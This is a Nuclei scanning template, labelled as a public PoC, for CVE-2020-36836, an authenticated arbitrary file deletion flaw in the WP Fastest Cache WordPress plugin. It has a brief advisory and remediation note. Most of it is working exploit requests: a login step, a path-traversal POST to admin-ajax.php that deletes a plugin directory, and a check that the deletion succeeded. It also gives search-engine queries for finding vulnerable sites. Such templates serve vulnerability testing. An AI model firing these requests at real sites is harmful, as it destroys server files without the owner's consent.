The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
PoC代码[已公开]
id: CVE-2020-36836
info:
name: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
author: melmathari
severity: high
description: |
The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
remediation: |
Update WP Fastest Cache to version 0.9.0.3 or later to mitigate this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
- https://nvd.nist.gov/vuln/detail/CVE-2020-36836
- https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
- https://wearetradecraft.com/advisories/tc-2020-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2020-36836
cwe-id: CWE-862
epss-score: 0.26088
epss-percentile: 0.96106
cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: wpfastestcache
product: wp_fastest_cache
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache
variables:
target_path: "languages"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302 || status_code == 200'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpfc_delete_current_page_cache
matchers:
- type: dsl
dsl:
- "contains_all(body, 'The cache of page has been cleared', 'success')"
- "status_code == 200"
condition: and
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 404"
internal: true
# digest: 4a0a00473045022100b1836833c80c458b29aa6b5e4b54234e7aa32f618f8f0d611fbf10691fa3fe03022062051c2d69518f5ce8b4df911422e0284277f495babf38eb9956ebd5cf1a4aa3:922c64590222798bb761d5b6d8e72950